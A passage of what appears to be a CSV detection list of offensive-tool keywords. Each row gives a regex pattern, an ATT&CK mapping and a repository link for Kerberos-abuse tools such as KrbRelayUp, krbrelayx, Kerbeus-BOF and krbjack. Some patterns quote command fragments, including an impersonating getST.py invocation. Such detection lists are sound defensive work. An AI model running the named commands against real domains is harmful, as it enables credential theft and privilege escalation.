T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_ptt /ticket:*",".{0,1000}krb_ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_purge /*",".{0,1000}krb_purge\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_renew /ticket:*",".{0,1000}krb_renew\s\/ticket\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_s4u /*",".{0,1000}krb_s4u\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_tgtdeleg /*",".{0,1000}krb_tgtdeleg\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_tgtdeleg(*)*",".{0,1000}krb_tgtdeleg\(.{0,1000}\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb_triage /*",".{0,1000}krb_triage\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krb2john.py*",".{0,1000}krb2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*krb5/kerberosv5.py*",".{0,1000}krb5\/kerberosv5\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*KRB5CCNAME=*.ccache* getST.py -self -impersonate * -k -no-pass -dc-ip *",".{0,1000}KRB5CCNAME\=.{0,1000}\.ccache.{0,1000}\sgetST\.py\s\-self\s\-impersonate\s.{0,1000}\s\-k\s\-no\-pass\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*krb5decoder*",".{0,1000}krb5decoder.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*krb5-enum-users *",".{0,1000}krb5\-enum\-users\s.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*krb5-enum-users.*",".{0,1000}krb5\-enum\-users\..{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*krbasktgt /*",".{0,1000}krbasktgt\s\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*krbcredccache.py*",".{0,1000}krbcredccache\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*krbjack -*",".{0,1000}krbjack\s\-.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*krbjack.tcpforward*",".{0,1000}krbjack\.tcpforward.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*krbjacker.py*",".{0,1000}krbjacker\.py.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*krbjack-main*",".{0,1000}krbjack\-main.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*KrbRelay*misc*",".{0,1000}KrbRelay.{0,1000}misc.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay*smb*",".{0,1000}KrbRelay.{0,1000}smb.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay*spoofing*",".{0,1000}KrbRelay.{0,1000}spoofing.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.Clients.Attacks*",".{0,1000}KrbRelay\.Clients\.Attacks.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelay.csproj*",".{0,1000}KrbRelay\.csproj.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelay.exe*",".{0,1000}KrbRelay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelay.sln*",".{0,1000}KrbRelay\.sln.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*KrbRelayUp - Relaying you to SYSTEM*",".{0,1000}KrbRelayUp\s\-\sRelaying\syou\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KrbRelayUp.csproj*",".{0,1000}KrbRelayUp\.csproj.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KrbRelayUp.DSInternals.Common.Properties*",".{0,1000}KrbRelayUp\.DSInternals\.Common\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*KrbRelayUp.exe*",".{0,1000}KrbRelayUp\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelayUp.lib*",".{0,1000}KrbRelayUp\.lib.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*KrbRelayUp/1.0*",".{0,1000}KrbRelayUp\/1\.0.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","1","user-agent","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*krbrelayx*",".{0,1000}krbrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbrelayx.git*",".{0,1000}krbrelayx\.git.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "*krbrelayx.py -*",".{0,1000}krbrelayx\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - 